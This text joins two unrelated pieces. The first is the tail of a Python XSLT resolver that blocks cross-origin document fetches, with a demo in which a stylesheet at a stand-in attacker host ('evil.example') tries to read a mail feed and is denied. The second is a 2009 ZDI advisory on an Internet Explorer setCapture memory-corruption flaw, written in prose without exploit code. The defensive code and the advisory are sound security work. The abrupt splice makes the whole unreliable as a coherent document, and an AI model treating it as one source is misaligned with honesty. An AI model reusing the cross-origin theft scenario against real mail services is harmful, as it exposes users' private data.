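            self.audit.append(("deny", self.stylesheet_url, url))
            return None
        self.audit.append(("allow", self.stylesheet_url, url))
        return self.web.get(url)


if __name__ == "__main__":
    # A stylesheet served from one host asking for a feed on another: denied.
    evil = XsltDocumentResolver("http://evil.example/safaristealmailbug.xsl")
    print(evil.document("https://mail.example/feed/atom"))  # None
    # A stylesheet fetching its own site's data: allowed.
    own = XsltDocumentResolver("https://app.example/style.xsl")
    print(own.document("data.xml"))  # <data>public widget data</data>
    for entry in evil.audit + own.audit:
        print(entry)
```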
ZDI-09-036: Microsoft Internet Explorer setCapture Memory Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-036
June 10, 2009

-- CVE ID:
CVE-2009-1529

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Internet Explorer

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.

The specific vulnerability exists when calling the setCapture method on a range of objects. When setCapture is called on a collection of specially crafted objects memory becomes corrupted. When the capture is released, arbitrary memory is accessed potentially leading to remote code execution. Exploitation of this vulnerability will lead to system compromise under the credentials of the currently logged in user.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details can be found at:
http://www.microsoft.com/technet/security/bulletin/MS09-019.mspx

-- Disclosure Timeline:
2009-01-26 - Vulnerability reported to vendor
2009-06-10 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Peter Vreugdenhil